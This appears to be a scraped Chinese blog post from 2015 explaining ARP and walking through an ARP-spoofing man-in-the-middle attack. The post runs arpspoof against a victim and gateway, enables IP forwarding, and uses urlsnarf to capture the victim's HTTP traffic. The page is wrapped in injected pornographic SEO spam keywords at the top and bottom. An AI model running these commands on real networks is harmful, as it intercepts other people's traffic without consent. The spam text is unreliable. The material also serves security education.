<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      利用arpspoof和urlsnarf 進行ARP嗅探

      地址解析協議 (ARP, Address Resolution Protocol) 是如何將網絡設備的MAC地址和其IP地址關聯起來的,這樣在同一個局域網內的設備就能相互知道彼此的存在。ARP基本上就是一種網絡上的點名。

      ARP,一個十分簡單的協議,僅僅只包含了4種消息類型:

      1.  ARP請求。計算機A詢問整個局域網,“Who has this IP address?” (“誰的IP地址是這個?”,英文為本來報文里的ASCII碼消息,譯者注)

      2.  ARP響應。計算機B告訴計算機A,“I have that IP. My MAC address is [whatever it is].” (我的IP地址是那個。我的MAC地址是[XX:XX:XX:XX:XX:XX])

      4.  反向ARP請求。和ARP請求的概念一樣,但是計算機A詢問,“Who has this MAC address?” (誰的MAC地址是這個?)

      4.  反向ARP響應。計算機B告訴計算機A,“I have that MAC. My IP address is [whatever it is]” (我的MAC地址是那個。我的IP地址是XXX. XXX. XXX. XXX)

      所有的網絡設備都有一個ARP映射表,就是內存里的一小段存儲著目前該設備已經匹配的IP地址和MAC地址對。ARP映射表確保該設備不會向它已經通訊過的設備重復發送ARP請求。

      arpspoof是Arp緩存中毒攻擊,Arp嗅探的工具。常見的其他的也有Ettercap等。默認網卡eth0。也可以不指定。

      # arpspoof -i eth0 -t victim gateway  #欺騙目標主機以為我們是網關
      # arpspoof -i eth0 -t gateway victim  #在一個單獨的shell里執行這個命令,欺騙網關相信目標主機
      # echo 1 > /proc/sys/net/ipv4/ip_forward   #啟動IP轉發,使得目標主機可以通過你的主機連到網關,否則目標無法上網

      然后可以用urlsnarf嗅探目標主機的http傳輸數據。tcp port 80 or port 8080 or port 3128。

      urlsnarf -i eth0

      先執行 bash0的,再執行bash1的命令。然后等個30s-1min欺騙成功,然后再執行bash2的嗅探http數據。

      posted @ 2015-04-27 16:51  安全大可  閱讀(1291)  評論(0)    收藏  舉報
      真正的安全感源自于自身的實力
      回頂部
      主站蜘蛛池模板: 国产成人av免费观看| 又粗又紧又湿又爽的视频| 日本强伦片中文字幕免费看| 亚洲色av天天天天天天| 天天噜噜日日久久综合网| 国产精品一区高清在线观看| 国内精品久久久久久无码不卡| 久久96热人妻偷产精品| 亚洲av成人在线一区| 三级国产三级在线| 亚洲国产无套无码av电影| 亚洲精品国产av成人网| 亚洲精品一区国产精品| 精品人妻少妇一区二区三区| 国产成人亚洲日韩欧美| 18禁在线一区二区三区| 日本一道一区二区视频| 国产精品高清一区二区三区| 熟女一区二区中文字幕| 久久婷婷成人综合色| 奇米影视7777久久精品| 强奷漂亮人妻系列老师| 日韩欧美猛交xxxxx无码| 日本一区二区久久人妻高清| 亚洲精品一区二区美女| 国产女人水真多18毛片18精品 | 国产性生大片免费观看性| 久久亚洲精品无码播放| 拍真实国产伦偷精品| 在线永久看片免费的视频| 日韩在线视频线观看一区| 榆中县| 亚洲十八禁一区二区三区| 重口SM一区二区三区视频| 郴州市| 免费99视频| 69人妻精品中文字幕| 亚洲av日韩在线资源| 国产亚洲精品久久综合阿香| 91久久久久无码精品露脸 | 久久久久国色av免费观看性色|